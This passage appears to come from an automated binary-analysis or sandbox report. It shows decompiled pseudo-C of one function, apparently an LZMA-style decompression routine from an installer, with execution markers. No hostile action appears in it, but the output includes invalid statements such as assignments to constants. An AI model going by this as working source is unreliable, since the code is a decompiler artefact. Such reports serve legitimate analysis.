631->635 632->619 634->578 635->602
                                                          C-Code - Quality: 98%
                                                          			E00406D5F() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				void* _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t590;
                                                          				signed int* _t607;
                                                          				void* _t614;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t614 - 0x40) != 0) {
                                                          						 *(_t614 - 0x34) = 1;
                                                          						 *(_t614 - 0x84) = 7;
                                                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                          						L132:
                                                          						 *(_t614 - 0x54) = _t607;
                                                          						L133:
                                                          						_t531 =  *_t607;
                                                          						_t590 = _t531 & 0x0000ffff;
                                                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                          						if( *(_t614 - 0xc) >= _t565) {
                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                          							 *(_t614 - 0x40) = 1;
                                                          							_t532 = _t531 - (_t531 >> 5);
                                                          							 *_t607 = _t532;
                                                          						} else {
                                                          							 *(_t614 - 0x10) = _t565;
                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                          						}
                                                          						if( *(_t614 - 0x10) >= 0x1000000) {
                                                          							L139:
                                                          							_t533 =  *(_t614 - 0x84);
                                                          							L140:
                                                          							 *(_t614 - 0x88) = _t533;
                                                          							goto L1;
                                                          						} else {
                                                          							L137:
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 5;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                          							goto L139;
                                                          						}
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          						__esi =  *(__ebp - 0x60);
                                                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          						__ecx =  *(__ebp - 0x3c);
                                                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          						__ecx =  *(__ebp - 4);
                                                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          						if( *(__ebp - 0x38) >= 4) {
                                                          							if( *(__ebp - 0x38) >= 0xa) {
                                                          								_t97 = __ebp - 0x38;
                                                          								 *_t97 =  *(__ebp - 0x38) - 6;
                                                          							} else {
                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          							}
                                                          						} else {
                                                          							 *(__ebp - 0x38) = 0;
                                                          						}
                                                          						if( *(__ebp - 0x34) == __edx) {
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							L60:
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx =  *(__ebp - 0x10);
                                                          							__esi = __edx + __eax;
                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								_t216 = __edx + 1; // 0x1
                                                          								__ebx = _t216;
                                                          								__cx = __ax >> 5;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								L59:
                                                          								if(__ebx >= 0x100) {
                                                          									goto L54;
                                                          								}
                                                          								goto L60;
                                                          							} else {
                                                          								L57:
                                                          								if( *(__ebp - 0x6c) == 0) {
                                                          									 *(__ebp - 0x88) = 0xf;
                                                          									goto L170;
                                                          								}
                                                          								__ecx =  *(__ebp - 0x70);
                                                          								__eax =  *(__ebp - 0xc);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								_t202 = __ebp - 0x70;
                                                          								 *_t202 =  *(__ebp - 0x70) + 1;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								goto L59;
                                                          							}
                                                          						} else {
                                                          							__eax =  *(__ebp - 0x14);
                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                          							}
                                                          							__ecx =  *(__ebp - 8);
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          							L40:
                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          							 *(__ebp - 0x48) = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								 *(__ebp - 0x40) = 1;
                                                          								__cx = __ax >> 5;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								L38:
                                                          								__eax =  *(__ebp - 0x40);
                                                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          									while(1) {
                                                          										if(__ebx >= 0x100) {
                                                          											break;
                                                          										}
                                                          										__eax =  *(__ebp - 0x58);
                                                          										__edx = __ebx + __ebx;
                                                          										__ecx =  *(__ebp - 0x10);
                                                          										__esi = __edx + __eax;
                                                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          										__ax =  *__esi;
                                                          										 *(__ebp - 0x54) = __esi;
                                                          										__edi = __ax & 0x0000ffff;
                                                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          										if( *(__ebp - 0xc) >= __ecx) {
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          											__cx = __ax;
                                                          											_t169 = __edx + 1; // 0x1
                                                          											__ebx = _t169;
                                                          											__cx = __ax >> 5;
                                                          											 *__esi = __ax;
                                                          										} else {
                                                          											 *(__ebp - 0x10) = __ecx;
                                                          											0x800 = 0x800 - __edi;
                                                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          											__ebx = __ebx + __ebx;
                                                          											 *__esi = __cx;
                                                          										}
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										if( *(__ebp - 0x10) < 0x1000000) {
                                                          											L45:
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t155 = __ebp - 0x70;
                                                          											 *_t155 =  *(__ebp - 0x70) + 1;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          										}
                                                          									}
                                                          									L53:
                                                          									_t172 = __ebp - 0x34;
                                                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                          									L54:
                                                          									__al =  *(__ebp - 0x44);
                                                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          									L55:
                                                          									if( *(__ebp - 0x64) == 0) {
                                                          										 *(__ebp - 0x88) = 0x1a;
                                                          										goto L170;
                                                          									}
                                                          									__ecx =  *(__ebp - 0x68);
                                                          									__al =  *(__ebp - 0x5c);
                                                          									__edx =  *(__ebp - 8);
                                                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          									 *( *(__ebp - 0x68)) = __al;
                                                          									__ecx =  *(__ebp - 0x14);
                                                          									 *(__ecx +  *(__ebp - 8)) = __al;
                                                          									__eax = __ecx + 1;
                                                          									__edx = 0;
                                                          									_t191 = __eax %  *(__ebp - 0x74);
                                                          									__eax = __eax /  *(__ebp - 0x74);
                                                          									__edx = _t191;
                                                          									L79:
                                                          									 *(__ebp - 0x14) = __edx;
                                                          									L80:
                                                          									 *(__ebp - 0x88) = 2;
                                                          									goto L1;
                                                          								}
                                                          								if(__ebx >= 0x100) {
                                                          									goto L53;
                                                          								}
                                                          								goto L40;
                                                          							} else {
                                                          								L36:
                                                          								if( *(__ebp - 0x6c) == 0) {
                                                          									 *(__ebp - 0x88) = 0xd;
                                                          									L170:
                                                          									_t568 = 0x22;
                                                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                          									_t535 = 0;
                                                          									L172:
                                                          									return _t535;
                                                          								}
                                                          								__ecx =  *(__ebp - 0x70);
                                                          								__eax =  *(__ebp - 0xc);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								_t121 = __ebp - 0x70;
                                                          								 *_t121 =  *(__ebp - 0x70) + 1;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								goto L38;
                                                          							}
                                                          						}
                                                          					}
                                                          					L1:
                                                          					_t534 =  *(_t614 - 0x88);
                                                          					if(_t534 > 0x1c) {
                                                          						L171:
                                                          						_t535 = _t534 | 0xffffffff;
                                                          						goto L172;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          						case 0:
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							_t534 =  *( *(_t614 - 0x70));
                                                          							if(_t534 > 0xe1) {
                                                          								goto L171;
                                                          							}
                                                          							_t538 = _t534 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t570);
                                                          							_push(9);
                                                          							_pop(_t571);
                                                          							_t610 = _t538 / _t570;
                                                          							_t540 = _t538 % _t570 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t605 = _t540 % _t571 & 0x000000ff;
                                                          							 *(_t614 - 0x3c) = _t605;
                                                          							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                          							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                          							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                          								L10:
                                                          								if(_t613 == 0) {
                                                          									L12:
                                                          									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                          									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                          									goto L15;
                                                          								} else {
                                                          									goto L11;
                                                          								}
                                                          								do {
                                                          									L11:
                                                          									_t613 = _t613 - 1;
                                                          									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                          								} while (_t613 != 0);
                                                          								goto L12;
                                                          							}
                                                          							if( *(_t614 - 4) != 0) {
                                                          								GlobalFree( *(_t614 - 4));
                                                          							}
                                                          							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          							 *(_t614 - 4) = _t534;
                                                          							if(_t534 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                          								goto L10;
                                                          							}
                                                          						case 1:
                                                          							L13:
                                                          							__eflags =  *(_t614 - 0x6c);
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 1;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							_t45 = _t614 - 0x48;
                                                          							 *_t45 =  *(_t614 - 0x48) + 1;
                                                          							__eflags =  *_t45;
                                                          							L15:
                                                          							if( *(_t614 - 0x48) < 4) {
                                                          								goto L13;
                                                          							}
                                                          							_t546 =  *(_t614 - 0x40);
                                                          							if(_t546 ==  *(_t614 - 0x74)) {
                                                          								L20:
                                                          								 *(_t614 - 0x48) = 5;
                                                          								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                          								goto L23;
                                                          							}
                                                          							 *(_t614 - 0x74) = _t546;
                                                          							if( *(_t614 - 8) != 0) {
                                                          								GlobalFree( *(_t614 - 8));
                                                          							}
                                                          							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                          							 *(_t614 - 8) = _t534;
                                                          							if(_t534 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						case 2:
                                                          							L24:
                                                          							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                          							 *(_t614 - 0x84) = 6;
                                                          							 *(_t614 - 0x4c) = _t553;
                                                          							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                          							goto L132;
                                                          						case 3:
                                                          							L21:
                                                          							__eflags =  *(_t614 - 0x6c);
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 3;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							_t67 = _t614 - 0x70;
                                                          							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                          							__eflags =  *_t67;
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                          							L23:
                                                          							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                          							if( *(_t614 - 0x48) != 0) {
                                                          								goto L21;
                                                          							}
                                                          							goto L24;
                                                          						case 4:
                                                          							goto L133;
                                                          						case 5:
                                                          							goto L137;
                                                          						case 6:
                                                          							goto L0;
                                                          						case 7:
                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                          							if( *(__ebp - 0x40) != 1) {
                                                          								__eax =  *(__ebp - 0x24);
                                                          								 *(__ebp - 0x80) = 0x16;
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x28);
                                                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          								__eax = 0;
                                                          								__eflags =  *(__ebp - 0x38) - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 4) + 0x664;
                                                          								__eflags = __eax;
                                                          								 *(__ebp - 0x58) = __eax;
                                                          								goto L68;
                                                          							}
                                                          							__eax =  *(__ebp - 4);
                                                          							__ecx =  *(__ebp - 0x38);
                                                          							 *(__ebp - 0x84) = 8;
                                                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          							goto L132;
                                                          						case 8:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xa;
                                                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x38);
                                                          								__ecx =  *(__ebp - 4);
                                                          								__eax =  *(__ebp - 0x38) + 0xf;
                                                          								 *(__ebp - 0x84) = 9;
                                                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          							}
                                                          							goto L132;
                                                          						case 9:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								goto L89;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x60);
                                                          							if( *(__ebp - 0x60) == 0) {
                                                          								goto L171;
                                                          							}
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          							__eflags = _t258;
                                                          							0 | _t258 = _t258 + _t258 + 9;
                                                          							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          							goto L75;
                                                          						case 0xa:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x84) = 0xb;
                                                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x28);
                                                          							goto L88;
                                                          						case 0xb:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__ecx =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x20);
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x24);
                                                          							}
                                                          							__ecx =  *(__ebp - 0x28);
                                                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          							L88:
                                                          							__ecx =  *(__ebp - 0x2c);
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          							L89:
                                                          							__eax =  *(__ebp - 4);
                                                          							 *(__ebp - 0x80) = 0x15;
                                                          							__eax =  *(__ebp - 4) + 0xa68;
                                                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          							goto L68;
                                                          						case 0xc:
                                                          							L99:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0xc;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t334 = __ebp - 0x70;
                                                          							 *_t334 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t334;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							__eax =  *(__ebp - 0x2c);
                                                          							goto L101;
                                                          						case 0xd:
                                                          							goto L36;
                                                          						case 0xe:
                                                          							goto L45;
                                                          						case 0xf:
                                                          							goto L57;
                                                          						case 0x10:
                                                          							L109:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x10;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t365 = __ebp - 0x70;
                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t365;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							goto L111;
                                                          						case 0x11:
                                                          							L68:
                                                          							__esi =  *(__ebp - 0x58);
                                                          							 *(__ebp - 0x84) = 0x12;
                                                          							goto L132;
                                                          						case 0x12:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 0x58);
                                                          								 *(__ebp - 0x84) = 0x13;
                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							__eflags = __eax;
                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          							goto L130;
                                                          						case 0x13:
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								_t469 = __ebp - 0x58;
                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          								__eflags =  *_t469;
                                                          								 *(__ebp - 0x30) = 0x10;
                                                          								 *(__ebp - 0x40) = 8;
                                                          								L144:
                                                          								 *(__ebp - 0x7c) = 0x14;
                                                          								goto L145;
                                                          							}
                                                          							__eax =  *(__ebp - 0x4c);
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                          							 *(__ebp - 0x30) = 8;
                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          							L130:
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							 *(__ebp - 0x40) = 3;
                                                          							goto L144;
                                                          						case 0x14:
                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          							__eax =  *(__ebp - 0x80);
                                                          							goto L140;
                                                          						case 0x15:
                                                          							__eax = 0;
                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          							__al = __al & 0x000000fd;
                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          							goto L120;
                                                          						case 0x16:
                                                          							__eax =  *(__ebp - 0x30);
                                                          							__eflags = __eax - 4;
                                                          							if(__eax >= 4) {
                                                          								_push(3);
                                                          								_pop(__eax);
                                                          							}
                                                          							__ecx =  *(__ebp - 4);
                                                          							 *(__ebp - 0x40) = 6;
                                                          							__eax = __eax << 7;
                                                          							 *(__ebp - 0x7c) = 0x19;
                                                          							 *(__ebp - 0x58) = __eax;
                                                          							goto L145;
                                                          						case 0x17:
                                                          							L145:
                                                          							__eax =  *(__ebp - 0x40);
                                                          							 *(__ebp - 0x50) = 1;
                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          							goto L149;
                                                          						case 0x18:
                                                          							L146:
                                                          							__eflags =  *(__ebp - 0x6c);
                                                          							if( *(__ebp - 0x6c) == 0) {
                                                          								 *(__ebp - 0x88) = 0x18;
                                                          								goto L170;
                                                          							}
                                                          							__ecx =  *(__ebp - 0x70);
                                                          							__eax =  *(__ebp - 0xc);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							_t484 = __ebp - 0x70;
                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                          							__eflags =  *_t484;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          							L148:
                                                          							_t487 = __ebp - 0x48;
                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                          							__eflags =  *_t487;
                                                          							L149:
                                                          							__eflags =  *(__ebp - 0x48);
                                                          							if( *(__ebp - 0x48) <= 0) {
                                                          								__ecx =  *(__ebp - 0x40);
                                                          								__ebx =  *(__ebp - 0x50);
                                                          								0 = 1;
                                                          								__eax = 1 << __cl;
                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          								__eax =  *(__ebp - 0x7c);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								goto L140;
                                                          							}
                                                          							__eax =  *(__ebp - 0x50);
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          							__eax =  *(__ebp - 0x58);
